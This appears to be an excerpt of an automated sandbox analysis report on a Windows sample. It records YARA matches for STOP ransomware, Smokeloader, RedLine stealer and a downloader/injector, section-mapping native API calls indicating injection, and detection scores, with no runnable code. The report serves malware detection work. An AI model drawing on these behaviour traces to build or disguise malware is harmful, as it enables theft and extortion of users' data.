Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00406150 11_2_00406150
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_004041D0 11_2_004041D0
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_004021D0 11_2_004021D0
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_0042429D 11_2_0042429D
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00411470 11_2_00411470
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_0042C5FE 11_2_0042C5FE
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_004266B9 11_2_004266B9
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00402830 11_2_00402830
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_0040C9A0 11_2_0040C9A0
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00419A6E 11_2_00419A6E
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_0041CAF0 11_2_0041CAF0
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00409B10 11_2_00409B10
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_0042AB9A 11_2_0042AB9A
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_0040CC40 11_2_0040CC40
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00401D90 11_2_00401D90
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_0040CE90 11_2_0040CE90
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00421F48 11_2_00421F48
PE file contains more sections than normal
Source: sqlite3.dll.19.dr Static PE information: Number of sections : 18 > 10
Source: XandETC.exe.14.dr Static PE information: Number of sections : 11 > 10
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 15.2.3046.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 15.2.3046.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.2.3046.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 33.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 33.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 33.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 42.2.3046.exe.23315a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 42.2.3046.exe.23315a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 42.2.3046.exe.23315a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 13.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 13.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.2.3046.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 15.2.3046.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.2.3046.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 42.2.3046.exe.23315a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 42.2.3046.exe.23315a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 42.2.3046.exe.23315a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 33.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 33.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 33.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 13.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 13.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 39.2.3046.exe.23815a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 39.2.3046.exe.23815a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 39.2.3046.exe.23815a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 39.2.3046.exe.23815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 39.2.3046.exe.23815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 39.2.3046.exe.23815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.0.A33B.exe.7b0000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
Source: 00000011.00000002.443553763.0000000000640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000011.00000002.444263115.0000000000816000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.313442333.0000000000926000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000D.00000002.396738460.000000000222E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000021.00000002.516055302.00000000022BA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000002A.00000002.518333813.0000000002290000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000012.00000002.483535048.0000000000726000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.313241208.0000000000680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.313394418.0000000000851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.313299344.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000011.00000002.443874552.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000B.00000002.604551133.0000000000550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000012.00000002.483475283.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000B.00000002.605642320.00000000007C6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000011.00000002.444700260.00000000021E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000027.00000002.517661661.00000000022E4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000002A.00000002.518796436.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000027.00000002.518320509.0000000002380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 3046.exe PID: 3680, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 3046.exe PID: 5672, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 3046.exe PID: 3112, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\A33B.exe, type: DROPPED Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: String function: 00413FF0 appears 54 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401558 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401558
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401749 NtMapViewOfSection,NtMapViewOfSection, 0_2_00401749
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401564 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401564
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401577
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401523 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401523
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401585 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401585
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040158C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_0040158C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040159A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_0040159A
Source: 3046.exe.4.dr Static PE information: Section: .data ZLIB complexity 0.9922957294330775
Source: 3046.exe.15.dr Static PE information: Section: .data ZLIB complexity 0.9922957294330775
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lock Jump to behavior
Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@40/35@15/12
Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini Jump to behavior
Source: file.exe ReversingLabs: Detection: 48%
Source: file.exe Virustotal: Detection: 34%
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
